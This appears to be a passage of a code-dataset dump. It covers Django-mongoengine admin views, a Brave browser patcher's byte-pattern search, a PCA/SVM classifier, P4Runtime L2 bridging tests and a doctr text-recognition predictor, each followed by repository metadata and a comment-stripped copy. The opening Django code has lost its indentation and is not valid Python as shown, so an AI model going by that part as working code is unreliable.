# Hide the "Save" and "Save and continue" buttons if "Save as New" was
# previously chosen to prevent the interface from getting confusing.
if request.method == 'POST' and not form_validated and "_saveasnew" in request.POST:
context['show_save'] = False
context['show_save_and_continue'] = False
# Use the change template instead of the add template.
add = False
context.update(extra_context or {})
return self.render_change_form(request, context, add=add, change=not add, obj=obj, form_url=form_url)
@csrf_protect_m
def delete_view(self, request, object_id, extra_context=None):
opts = self.model._meta
app_label = opts.app_label
to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
if to_field and not self.to_field_allowed(request, to_field):
raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)
obj = self.get_object(request, unquote(object_id), to_field)
if not self.has_delete_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(
_('%(name)s object with primary key %(key)r does not exist.') %
{'name': force_text(opts.verbose_name), 'key': escape(object_id)}
)
from django.db import router
using = router.db_for_write(self.model)
# Populate deleted_objects, a data structure of all related objects that
# will also be deleted.
(deleted_objects, model_count, perms_needed, protected) = get_deleted_objects(
[obj], opts, request.user, self.admin_site, using)
if request.POST: # The user has already confirmed the deletion.
if perms_needed:
raise PermissionDenied
obj_display = force_text(obj)
attr = str(to_field) if to_field else opts.pk.attname
obj_id = obj.serializable_value(attr)
self.log_deletion(request, obj, obj_display)
self.delete_model(request, obj)
return self.response_delete(request, obj_display, obj_id)
object_name = force_text(opts.verbose_name)
if perms_needed or protected:
title = _("Cannot delete %(name)s") % {"name": object_name}
else:
title = _("Are you sure?")
context = dict(
self.admin_site.each_context(request),
title=title,
object_name=object_name,
object=obj,
deleted_objects=deleted_objects,
model_count=dict(model_count).items(),
perms_lacking=perms_needed,
protected=protected,
opts=opts,
app_label=app_label,
preserved_filters=self.get_preserved_filters(request),
is_popup=(IS_POPUP_VAR in request.POST or
IS_POPUP_VAR in request.GET),
to_field=to_field,
)
context.update(extra_context or {})
return self.render_delete_form(request, context)
def history_view(self, request, object_id, extra_context=None):
from django.contrib.admin.models import LogEntry
# First check if the user can see this history.
model = self.model
obj = self.get_object(request, unquote(object_id))
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
'name': force_text(model._meta.verbose_name),
'key': escape(object_id),
})
if not self.has_change_permission(request, obj):
raise PermissionDenied
# Then get the history for this object.
opts = model._meta
app_label = opts.app_label
action_list = LogEntry.objects.filter(
object_id=unquote(object_id),
content_type=get_content_type_for_model(model)
).select_related().order_by('action_time')
context = dict(
self.admin_site.each_context(request),
title=_('Change history: %s') % force_text(obj),
action_list=action_list,
module_name=capfirst(force_text(opts.verbose_name_plural)),
object=obj,
opts=opts,
preserved_filters=self.get_preserved_filters(request),
)
context.update(extra_context or {})
request.current_app = self.admin_site.name
return TemplateResponse(request, self.object_history_template or [
"admin/%s/%s/object_history.html" % (app_label, opts.model_name),
"admin/%s/object_history.html" % app_label,
"admin/object_history.html"
], context)
class InlineDocumentAdmin(BaseDocumentAdmin):
document = None
fk_name = None
formset = BaseInlineDocumentFormSet
extra = 1
max_num = None
template = None
verbose_name = None
verbose_name_plural = None
can_delete = True
def __init__(self, parent_document, admin_site):
self.admin_site = admin_site
self.parent_document = parent_document
self.opts = self.model._meta
super(InlineDocumentAdmin, self).__init__()
if self.verbose_name is None:
self.verbose_name = self.model._meta.verbose_name
if self.verbose_name_plural is None:
self.verbose_name_plural = self.model._meta.verbose_name_plural
media = djmod.ModelAdmin.media
def get_formset(self, request, obj=None, **kwargs):
if self.declared_fieldsets:
fields = flatten_fieldsets(self.declared_fieldsets)
else:
fields = None
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
exclude.extend(kwargs.get("exclude", []))
exclude.extend(self.get_readonly_fields(request, obj))
# if exclude is an empty list we use None, since that's the actual
exclude = exclude or None
defaults = {
"form": self.form,
"formset": self.formset,
"fields": fields,
"exclude": exclude,
"formfield_callback": curry(self.formfield_for_dbfield, request=request),
"extra": self.extra,
"max_num": self.max_num,
"can_delete": self.can_delete,
}
defaults.update(kwargs)
return inlineformset_factory(self.model, **defaults)
def get_fieldsets(self, request, obj=None):
if self.declared_fieldsets:
return self.declared_fieldsets
form = self.get_formset(request).form
fields = form.base_fields.keys() + list(self.get_readonly_fields(request, obj))
return [(None, {'fields': fields})]
class EmbeddedDocumentAdmin(InlineDocumentAdmin):
def __init__(self, field, parent_document, admin_site):
if hasattr(field, 'field'):
self.model = field.field.document_type
else:
self.model = field.document_type
self.doc_list = getattr(parent_document, field.name)
self.field = field
if not isinstance(self.doc_list, list):
self.doc_list = []
self.rel_name = field.name
if self.verbose_name is None:
self.verbose_name = "Field: %s (Document: %s)" % (capfirst(field.name), self.model._meta.verbose_name)
if self.verbose_name_plural is None:
self.verbose_name_plural = "Field: %s (Document: %s)" % (capfirst(field.name), self.model._meta.verbose_name_plural)
super(EmbeddedDocumentAdmin, self).__init__(parent_document, admin_site)
def queryset(self, request):
if isinstance(self.field, ListField):
self.doc_list = getattr(self.parent_document, self.rel_name)
else:
emb_doc = getattr(self.parent_document, self.rel_name)
if emb_doc is None:
self.doc_list = []
else:
self.doc_list = [emb_doc]
return self.doc_list
class StackedDocumentInline(InlineDocumentAdmin):
template = 'admin/edit_inline/stacked.html'
class EmbeddedStackedDocumentAdmin(EmbeddedDocumentAdmin):
template = 'admin/edit_inline/stacked.html'
class TabularDocumentInline(InlineDocumentAdmin):
template = 'admin/edit_inline/tabular.html'
| true | true |
f7231cca10950bdf68f2ae42faed1754e83b258a | 652 | py | Python | bravepatcher/patcher/MemorySearch.py | maxisoft/BravePatcher | b745567297460eb6a7d8567eb3707cc14cc9d66f | [
"MIT"
] | 3 | 2021-11-11T23:10:59.000Z | 2022-02-05T09:14:15.000Z | bravepatcher/patcher/MemorySearch.py | maxisoft/BravePatcher | b745567297460eb6a7d8567eb3707cc14cc9d66f | [
"MIT"
] | 3 | 2021-01-12T21:31:18.000Z | 2021-11-11T23:12:02.000Z | bravepatcher/patcher/MemorySearch.py | maxisoft/BravePatcher | b745567297460eb6a7d8567eb3707cc14cc9d66f | [
"MIT"
] | null | null | null | import re
from ..pattern.Pattern import Pattern
from .exceptions import (MemorySearchNotFoundException,
MemorySearchTooManyMatchException)
class MemorySearch:
def __init__(self, memory: bytes):
self.memory = memory
def find_pattern(self, pattern: Pattern) -> re.Match:
regex = pattern.to_regex()
res = None
for m in re.finditer(regex, self.memory):
if res is not None:
raise MemorySearchTooManyMatchException("More than 1 matches")
res = m
if res is None:
raise MemorySearchNotFoundException("No match")
return res
| 29.636364 | 78 | 0.630368 | import re
from ..pattern.Pattern import Pattern
from .exceptions import (MemorySearchNotFoundException,
MemorySearchTooManyMatchException)
class MemorySearch:
def __init__(self, memory: bytes):
self.memory = memory
def find_pattern(self, pattern: Pattern) -> re.Match:
regex = pattern.to_regex()
res = None
for m in re.finditer(regex, self.memory):
if res is not None:
raise MemorySearchTooManyMatchException("More than 1 matches")
res = m
if res is None:
raise MemorySearchNotFoundException("No match")
return res
| true | true |
f7231ee03b215c0cb929c791fa2e3255ae82ab06 | 1,810 | py | Python | models/PCA.py | madcpt/MachineWontLie | 992156f3916bafeaa01a3685eae285550391132e | [
"MIT"
] | null | null | null | models/PCA.py | madcpt/MachineWontLie | 992156f3916bafeaa01a3685eae285550391132e | [
"MIT"
] | null | null | null | models/PCA.py | madcpt/MachineWontLie | 992156f3916bafeaa01a3685eae285550391132e | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch.nn import init
from torch.utils.data import DataLoader
from overrides import overrides
import numpy as np
import time
from models.BaseModel import BaseModel
class PCAModel(BaseModel):
def __init__(self, configs: object):
super().__init__(configs.model.model_name, configs.device)
from sklearn.decomposition import PCA
self.pca_cls = PCA(n_components=30)
from sklearn.svm import SVC
self.svm_cls = SVC(kernel="rbf", probability=True, )
@overrides
def train_epoch(self, epoch_num: int, train_loader: DataLoader):
x = torch.flatten(train_loader.dataset.data, 1).numpy()
y = train_loader.dataset.targets.numpy()
self.pca_cls.fit(x, y)
x_pca = self.pca_cls.transform(x)
# print(x_pca.shape)
self.svm_cls.fit(x_pca, y)
@overrides
def test_epoch(self, epoch_num: int, test_loader: DataLoader):
x = torch.flatten(test_loader.dataset.data, 1).numpy()
y = test_loader.dataset.targets.numpy()
pca_result: np.ndarray = self.pca_cls.transform(x)
predict_score = self.svm_cls.predict(pca_result)
predict_result = predict_score
# predict_result = np.argmax(predict_score,axis=1)
# print(x.shape, predict_score.shape, predict_result.shape, y.shape)
results: np.ndarray = predict_result == y
return sum(results) / len(results)
@overrides
def run_epochs(self, epochs: int, train_loader: DataLoader, test_loader: DataLoader):
t1 = time.time()
self.train_epoch(0, train_loader)
t2 = time.time()
acc = self.test_epoch(0, test_loader)
if self.writer:
self.writer.add_scalar('test_acc', acc, 0)
print(acc, t2 - t1, time.time() - t2)
| 35.490196 | 89 | 0.670166 | import torch
from torch import nn
from torch.nn import init
from torch.utils.data import DataLoader
from overrides import overrides
import numpy as np
import time
from models.BaseModel import BaseModel
class PCAModel(BaseModel):
def __init__(self, configs: object):
super().__init__(configs.model.model_name, configs.device)
from sklearn.decomposition import PCA
self.pca_cls = PCA(n_components=30)
from sklearn.svm import SVC
self.svm_cls = SVC(kernel="rbf", probability=True, )
@overrides
def train_epoch(self, epoch_num: int, train_loader: DataLoader):
x = torch.flatten(train_loader.dataset.data, 1).numpy()
y = train_loader.dataset.targets.numpy()
self.pca_cls.fit(x, y)
x_pca = self.pca_cls.transform(x)
self.svm_cls.fit(x_pca, y)
@overrides
def test_epoch(self, epoch_num: int, test_loader: DataLoader):
x = torch.flatten(test_loader.dataset.data, 1).numpy()
y = test_loader.dataset.targets.numpy()
pca_result: np.ndarray = self.pca_cls.transform(x)
predict_score = self.svm_cls.predict(pca_result)
predict_result = predict_score
results: np.ndarray = predict_result == y
return sum(results) / len(results)
@overrides
def run_epochs(self, epochs: int, train_loader: DataLoader, test_loader: DataLoader):
t1 = time.time()
self.train_epoch(0, train_loader)
t2 = time.time()
acc = self.test_epoch(0, test_loader)
if self.writer:
self.writer.add_scalar('test_acc', acc, 0)
print(acc, t2 - t1, time.time() - t2)
| true | true |
f7231f236ea0911cdecd1c3501b6bbc5111e564b | 11,176 | py | Python | ptf/tests/bridging.py | daniele-moro/ngsdn-tutorial | c95f6933f0a26a8b5732bdee71d8f5a1d80dcbda | [
"Apache-2.0"
] | null | null | null | ptf/tests/bridging.py | daniele-moro/ngsdn-tutorial | c95f6933f0a26a8b5732bdee71d8f5a1d80dcbda | [
"Apache-2.0"
] | null | null | null | ptf/tests/bridging.py | daniele-moro/ngsdn-tutorial | c95f6933f0a26a8b5732bdee71d8f5a1d80dcbda | [
"Apache-2.0"
] | null | null | null | # Copyright 2013-present Barefoot Networks, Inc.
# Copyright 2018-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
# BRIDGING TESTS
#
# To run all tests in this file:
# cd ptf
# make bridging
#
# To run a specific test case:
# make bridging.<TEST CLASS NAME>
#
# For example:
# make bridging.BridgingTest
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# Modify everywhere you see TODO
#
# When providing your solution, make sure to use the same names for P4Runtime
# entities as specified in your P4Info file.
#
# Test cases are based on the P4 program design suggested in the exercises
# README. Make sure to modify the test cases accordingly if you decide to
# implement the pipeline differently.
# ------------------------------------------------------------------------------
from ptf.testutils import group
from base_test import *
# From the P4 program.
CPU_CLONE_SESSION_ID = 99
@group("bridging")
class ArpNdpRequestWithCloneTest(P4RuntimeTest):
"""Tests ability to broadcast ARP requests and NDP Neighbor Solicitation
(NS) messages as well as cloning to CPU (controller) for host discovery.
"""
def runTest(self):
# Test With both ARP and NDP NS packets...
print_inline("ARP request ... ")
arp_pkt = testutils.simple_arp_packet()
self.testPacket(arp_pkt)
print_inline("NDP NS ... ")
ndp_pkt = genNdpNsPkt(src_mac=HOST1_MAC, src_ip=HOST1_IPV6,
target_ip=HOST2_IPV6)
self.testPacket(ndp_pkt)
@autocleanup
def testPacket(self, pkt):
mcast_group_id = 10
mcast_ports = [self.port1, self.port2, self.port3]
# Add multicast group.
self.insert_pre_multicast_group(
group_id=mcast_group_id,
ports=mcast_ports)
# Match eth dst: FF:FF:FF:FF:FF:FF (MAC broadcast for ARP requests)
# TODO EXERCISE 2
# Modify names to match content of P4Info file (look for the fully
# qualified name of tables, match fields, and actions.
# ---- START SOLUTION ----
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_ternary_table",
match_fields={
# Ternary match.
"hdr.ethernet.dst_addr": (
"FF:FF:FF:FF:FF:FF",
"FF:FF:FF:FF:FF:FF")
},
action_name="IngressPipeImpl.set_multicast_group",
action_params={
"gid": mcast_group_id
},
priority=DEFAULT_PRIORITY
))
# ---- END SOLUTION ----
# Match eth dst: 33:33:**:**:**:** (IPv6 multicast for NDP requests)
# TODO EXERCISE 2
# Modify names to match content of P4Info file (look for the fully
# qualified name of tables, match fields, and actions.
# ---- START SOLUTION ----
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_ternary_table",
match_fields={
# Ternary match (value, mask)
"hdr.ethernet.dst_addr": (
"33:33:00:00:00:00",
"FF:FF:00:00:00:00")
},
action_name="IngressPipeImpl.set_multicast_group",
action_params={
"gid": mcast_group_id
},
priority=DEFAULT_PRIORITY
))
# ---- END SOLUTION ----
# Insert CPU clone session.
self.insert_pre_clone_session(
session_id=CPU_CLONE_SESSION_ID,
ports=[self.cpu_port])
# ACL entry to clone ARPs
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
# Ternary match.
"hdr.ethernet.ether_type": (ARP_ETH_TYPE, 0xffff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
# ACL entry to clone NDP Neighbor Solicitation
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
# Ternary match.
"hdr.ethernet.ether_type": (IPV6_ETH_TYPE, 0xffff),
"hdr.ipv6.next_hdr": (ICMPV6_IP_PROTO, 0xff),
"hdr.icmpv6.type": (NS_ICMPV6_TYPE, 0xff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
for inport in mcast_ports:
# Send packet...
testutils.send_packet(self, inport, str(pkt))
# Pkt should be received on CPU via PacketIn...
# Expected P4Runtime PacketIn message.
exp_packet_in_msg = self.helper.build_packet_in(
payload=str(pkt),
metadata={
"ingress_port": inport,
"_pad": 0
})
self.verify_packet_in(exp_packet_in_msg)
# ...and on all ports except the ingress one.
verify_ports = set(mcast_ports)
verify_ports.discard(inport)
for port in verify_ports:
testutils.verify_packet(self, pkt, port)
testutils.verify_no_other_packets(self)
@group("bridging")
class ArpNdpReplyWithCloneTest(P4RuntimeTest):
"""Tests ability to clone ARP replies and NDP Neighbor Advertisement
(NA) messages as well as unicast forwarding to requesting host.
"""
def runTest(self):
# Test With both ARP and NDP NS packets...
print_inline("ARP reply ... ")
# op=1 request, op=2 relpy
arp_pkt = testutils.simple_arp_packet(
eth_src=HOST1_MAC, eth_dst=HOST2_MAC, arp_op=2)
self.testPacket(arp_pkt)
print_inline("NDP NA ... ")
ndp_pkt = genNdpNaPkt(target_ip=HOST1_IPV6, target_mac=HOST1_MAC)
self.testPacket(ndp_pkt)
@autocleanup
def testPacket(self, pkt):
# L2 unicast entry, match on pkt's eth dst address.
# TODO EXERCISE 2
# Modify names to match content of P4Info file (look for the fully
# qualified name of tables, match fields, and actions.
# ---- START SOLUTION ----
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_exact_table",
match_fields={
# Exact match.
"hdr.ethernet.dst_addr": pkt[Ether].dst
},
action_name="IngressPipeImpl.set_egress_port",
action_params={
"port_num": self.port2
}
))
# ---- END SOLUTION ----
# CPU clone session.
self.insert_pre_clone_session(
session_id=CPU_CLONE_SESSION_ID,
ports=[self.cpu_port])
# ACL entry to clone ARPs
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
# Ternary match.
"hdr.ethernet.ether_type": (ARP_ETH_TYPE, 0xffff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
# ACL entry to clone NDP Neighbor Solicitation
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
# Ternary match.
"hdr.ethernet.ether_type": (IPV6_ETH_TYPE, 0xffff),
"hdr.ipv6.next_hdr": (ICMPV6_IP_PROTO, 0xff),
"hdr.icmpv6.type": (NA_ICMPV6_TYPE, 0xff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
testutils.send_packet(self, self.port1, str(pkt))
# Pkt should be received on CPU via PacketIn...
# Expected P4Runtime PacketIn message.
exp_packet_in_msg = self.helper.build_packet_in(
payload=str(pkt),
metadata={
"ingress_port": self.port1,
"_pad": 0
})
self.verify_packet_in(exp_packet_in_msg)
# ..and on port2 as indicated by the L2 unicast rule.
testutils.verify_packet(self, pkt, self.port2)
@group("bridging")
class BridgingTest(P4RuntimeTest):
"""Tests basic L2 unicast forwarding"""
def runTest(self):
# Test with different type of packets.
for pkt_type in ["tcp", "udp", "icmp", "tcpv6", "udpv6", "icmpv6"]:
print_inline("%s ... " % pkt_type)
pkt = getattr(testutils, "simple_%s_packet" % pkt_type)(pktlen=120)
self.testPacket(pkt)
@autocleanup
def testPacket(self, pkt):
# Insert L2 unicast entry, match on pkt's eth dst address.
# TODO EXERCISE 2
# Modify names to match content of P4Info file (look for the fully
# qualified name of tables, match fields, and actions.
# ---- START SOLUTION ----
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_exact_table",
match_fields={
# Exact match.
"hdr.ethernet.dst_addr": pkt[Ether].dst
},
action_name="IngressPipeImpl.set_egress_port",
action_params={
"port_num": self.port2
}
))
# ---- END SOLUTION ----
# Test bidirectional forwarding by swapping MAC addresses on the pkt
pkt2 = pkt_mac_swap(pkt.copy())
# Insert L2 unicast entry for pkt2.
# TODO EXERCISE 2
# Modify names to match content of P4Info file (look for the fully
# qualified name of tables, match fields, and actions.
# ---- START SOLUTION ----
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_exact_table",
match_fields={
# Exact match.
"hdr.ethernet.dst_addr": pkt2[Ether].dst
},
action_name="IngressPipeImpl.set_egress_port",
action_params={
"port_num": self.port1
}
))
# ---- END SOLUTION ----
# Send and verify.
testutils.send_packet(self, self.port1, str(pkt))
testutils.send_packet(self, self.port2, str(pkt2))
testutils.verify_each_packet_on_each_port(
self, [pkt, pkt2], [self.port2, self.port1])
| 35.479365 | 80 | 0.576503 |
from ptf.testutils import group
from base_test import *
CPU_CLONE_SESSION_ID = 99
@group("bridging")
class ArpNdpRequestWithCloneTest(P4RuntimeTest):
def runTest(self):
print_inline("ARP request ... ")
arp_pkt = testutils.simple_arp_packet()
self.testPacket(arp_pkt)
print_inline("NDP NS ... ")
ndp_pkt = genNdpNsPkt(src_mac=HOST1_MAC, src_ip=HOST1_IPV6,
target_ip=HOST2_IPV6)
self.testPacket(ndp_pkt)
@autocleanup
def testPacket(self, pkt):
mcast_group_id = 10
mcast_ports = [self.port1, self.port2, self.port3]
self.insert_pre_multicast_group(
group_id=mcast_group_id,
ports=mcast_ports)
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_ternary_table",
match_fields={
"hdr.ethernet.dst_addr": (
"FF:FF:FF:FF:FF:FF",
"FF:FF:FF:FF:FF:FF")
},
action_name="IngressPipeImpl.set_multicast_group",
action_params={
"gid": mcast_group_id
},
priority=DEFAULT_PRIORITY
))
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_ternary_table",
match_fields={
"hdr.ethernet.dst_addr": (
"33:33:00:00:00:00",
"FF:FF:00:00:00:00")
},
action_name="IngressPipeImpl.set_multicast_group",
action_params={
"gid": mcast_group_id
},
priority=DEFAULT_PRIORITY
))
self.insert_pre_clone_session(
session_id=CPU_CLONE_SESSION_ID,
ports=[self.cpu_port])
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
"hdr.ethernet.ether_type": (ARP_ETH_TYPE, 0xffff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
"hdr.ethernet.ether_type": (IPV6_ETH_TYPE, 0xffff),
"hdr.ipv6.next_hdr": (ICMPV6_IP_PROTO, 0xff),
"hdr.icmpv6.type": (NS_ICMPV6_TYPE, 0xff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
for inport in mcast_ports:
testutils.send_packet(self, inport, str(pkt))
exp_packet_in_msg = self.helper.build_packet_in(
payload=str(pkt),
metadata={
"ingress_port": inport,
"_pad": 0
})
self.verify_packet_in(exp_packet_in_msg)
verify_ports = set(mcast_ports)
verify_ports.discard(inport)
for port in verify_ports:
testutils.verify_packet(self, pkt, port)
testutils.verify_no_other_packets(self)
@group("bridging")
class ArpNdpReplyWithCloneTest(P4RuntimeTest):
def runTest(self):
print_inline("ARP reply ... ")
arp_pkt = testutils.simple_arp_packet(
eth_src=HOST1_MAC, eth_dst=HOST2_MAC, arp_op=2)
self.testPacket(arp_pkt)
print_inline("NDP NA ... ")
ndp_pkt = genNdpNaPkt(target_ip=HOST1_IPV6, target_mac=HOST1_MAC)
self.testPacket(ndp_pkt)
@autocleanup
def testPacket(self, pkt):
# TODO EXERCISE 2
# Modify names to match content of P4Info file (look for the fully
# qualified name of tables, match fields, and actions.
# ---- START SOLUTION ----
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_exact_table",
match_fields={
# Exact match.
"hdr.ethernet.dst_addr": pkt[Ether].dst
},
action_name="IngressPipeImpl.set_egress_port",
action_params={
"port_num": self.port2
}
))
# ---- END SOLUTION ----
# CPU clone session.
self.insert_pre_clone_session(
session_id=CPU_CLONE_SESSION_ID,
ports=[self.cpu_port])
# ACL entry to clone ARPs
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
# Ternary match.
"hdr.ethernet.ether_type": (ARP_ETH_TYPE, 0xffff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
# ACL entry to clone NDP Neighbor Solicitation
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.acl_table",
match_fields={
# Ternary match.
"hdr.ethernet.ether_type": (IPV6_ETH_TYPE, 0xffff),
"hdr.ipv6.next_hdr": (ICMPV6_IP_PROTO, 0xff),
"hdr.icmpv6.type": (NA_ICMPV6_TYPE, 0xff)
},
action_name="IngressPipeImpl.clone_to_cpu",
priority=DEFAULT_PRIORITY
))
testutils.send_packet(self, self.port1, str(pkt))
# Pkt should be received on CPU via PacketIn...
# Expected P4Runtime PacketIn message.
exp_packet_in_msg = self.helper.build_packet_in(
payload=str(pkt),
metadata={
"ingress_port": self.port1,
"_pad": 0
})
self.verify_packet_in(exp_packet_in_msg)
# ..and on port2 as indicated by the L2 unicast rule.
testutils.verify_packet(self, pkt, self.port2)
@group("bridging")
class BridgingTest(P4RuntimeTest):
def runTest(self):
# Test with different type of packets.
for pkt_type in ["tcp", "udp", "icmp", "tcpv6", "udpv6", "icmpv6"]:
print_inline("%s ... " % pkt_type)
pkt = getattr(testutils, "simple_%s_packet" % pkt_type)(pktlen=120)
self.testPacket(pkt)
@autocleanup
def testPacket(self, pkt):
# Insert L2 unicast entry, match on pkt's eth dst address.
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_exact_table",
match_fields={
"hdr.ethernet.dst_addr": pkt[Ether].dst
},
action_name="IngressPipeImpl.set_egress_port",
action_params={
"port_num": self.port2
}
))
pkt2 = pkt_mac_swap(pkt.copy())
self.insert(self.helper.build_table_entry(
table_name="IngressPipeImpl.l2_exact_table",
match_fields={
"hdr.ethernet.dst_addr": pkt2[Ether].dst
},
action_name="IngressPipeImpl.set_egress_port",
action_params={
"port_num": self.port1
}
))
testutils.send_packet(self, self.port1, str(pkt))
testutils.send_packet(self, self.port2, str(pkt2))
testutils.verify_each_packet_on_each_port(
self, [pkt, pkt2], [self.port2, self.port1])
| true | true |
f7231f3c31bbf1b8dd50af718421432779336757 | 2,551 | py | Python | doctr/models/recognition/predictor/pytorch.py | thentgesMindee/doctr | f97e92ba1b7bcb785a60f2cf549f13f88e510609 | [
"Apache-2.0"
] | null | null | null | doctr/models/recognition/predictor/pytorch.py | thentgesMindee/doctr | f97e92ba1b7bcb785a60f2cf549f13f88e510609 | [
"Apache-2.0"
] | null | null | null | doctr/models/recognition/predictor/pytorch.py | thentgesMindee/doctr | f97e92ba1b7bcb785a60f2cf549f13f88e510609 | [
"Apache-2.0"
] | 1 | 2022-01-27T09:25:05.000Z | 2022-01-27T09:25:05.000Z | # Copyright (C) 2021, Mindee.
# This program is licensed under the Apache License version 2.
# See LICENSE or go to <https://www.apache.org/licenses/LICENSE-2.0.txt> for full license details.
from typing import Any, List, Tuple, Union
import numpy as np
import torch
from torch import nn
from doctr.models.preprocessor import PreProcessor
from ._utils import remap_preds, split_crops
__all__ = ['RecognitionPredictor']
class RecognitionPredictor(nn.Module):
"""Implements an object able to identify character sequences in images
Args:
pre_processor: transform inputs for easier batched model inference
model: core detection architecture
split_wide_crops: wether to use crop splitting for high aspect ratio crops
"""
def __init__(
self,
pre_processor: PreProcessor,
model: nn.Module,
split_wide_crops: bool = True,
) -> None:
super().__init__()
self.pre_processor = pre_processor
self.model = model.eval()
self.split_wide_crops = split_wide_crops
self.critical_ar = 8 # Critical aspect ratio
self.dil_factor = 1.4 # Dilation factor to overlap the crops
self.target_ar = 4 # Target aspect ratio
@torch.no_grad()
def forward(
self,
crops: List[Union[np.ndarray, torch.Tensor]],
**kwargs: Any,
) -> List[Tuple[str, float]]:
if len(crops) == 0:
return []
# Dimension check
if any(crop.ndim != 3 for crop in crops):
raise ValueError("incorrect input shape: all crops are expected to be multi-channel 2D images.")
# Split crops that are too wide
remapped = False
if self.split_wide_crops:
new_crops, crop_map, remapped = split_crops(
crops,
self.critical_ar,
self.target_ar,
self.dil_factor,
isinstance(crops[0], np.ndarray)
)
if remapped:
crops = new_crops
# Resize & batch them
processed_batches = self.pre_processor(crops)
# Forward it
raw = [
self.model(batch, return_preds=True, **kwargs)['preds'] # type: ignore[operator]
for batch in processed_batches
]
# Process outputs
out = [charseq for batch in raw for charseq in batch]
# Remap crops
if self.split_wide_crops and remapped:
out = remap_preds(out, crop_map, self.dil_factor)
return out
| 29.662791 | 108 | 0.618189 |
from typing import Any, List, Tuple, Union
import numpy as np
import torch
from torch import nn
from doctr.models.preprocessor import PreProcessor
from ._utils import remap_preds, split_crops
__all__ = ['RecognitionPredictor']
class RecognitionPredictor(nn.Module):
def __init__(
self,
pre_processor: PreProcessor,
model: nn.Module,
split_wide_crops: bool = True,
) -> None:
super().__init__()
self.pre_processor = pre_processor
self.model = model.eval()
self.split_wide_crops = split_wide_crops
self.critical_ar = 8
self.dil_factor = 1.4
self.target_ar = 4
@torch.no_grad()
def forward(
self,
crops: List[Union[np.ndarray, torch.Tensor]],
**kwargs: Any,
) -> List[Tuple[str, float]]:
if len(crops) == 0:
return []
if any(crop.ndim != 3 for crop in crops):
raise ValueError("incorrect input shape: all crops are expected to be multi-channel 2D images.")
remapped = False
if self.split_wide_crops:
new_crops, crop_map, remapped = split_crops(
crops,
self.critical_ar,
self.target_ar,
self.dil_factor,
isinstance(crops[0], np.ndarray)
)
if remapped:
crops = new_crops
processed_batches = self.pre_processor(crops)
raw = [
self.model(batch, return_preds=True, **kwargs)['preds']
for batch in processed_batches
]
out = [charseq for batch in raw for charseq in batch]
if self.split_wide_crops and remapped:
out = remap_preds(out, crop_map, self.dil_factor)
return out
| true | true |
f7232002e9161baa044ee70c9064979f5ef015f3 | 1,562 | py | Python | Parsers/mysql/connector/version.py | bopopescu/py-try | 2e5638fad47dd4a2ab1f872d76063e405b3cadda | [
"MIT"
] | null | null | null | Parsers/mysql/connector/version.py | bopopescu/py-try | 2e5638fad47dd4a2ab1f872d76063e405b3cadda | [
"MIT"
] | null | null | null | Parsers/mysql/connector/version.py | bopopescu/py-try | 2e5638fad47dd4a2ab1f872d76063e405b3cadda | [
"MIT"
] | 1 | 2020-07-23T17:44:13.000Z | 2020-07-23T17:44:13.000Z | # MySQL Connector/Python - MySQL driver written in Python.
# Copyright (c) 2012, 2015, Oracle and/or its affiliates. All rights reserved.
# MySQL Connector/Python is licensed under the terms of the GPLv2
# <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>, like most
# MySQL Connectors. There are special exceptions to the terms and
# conditions of the GPLv2 as it is applied to this software, see the
# FOSS License Exception
# <http://www.mysql.com/about/legal/licensing/foss-exception.html>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
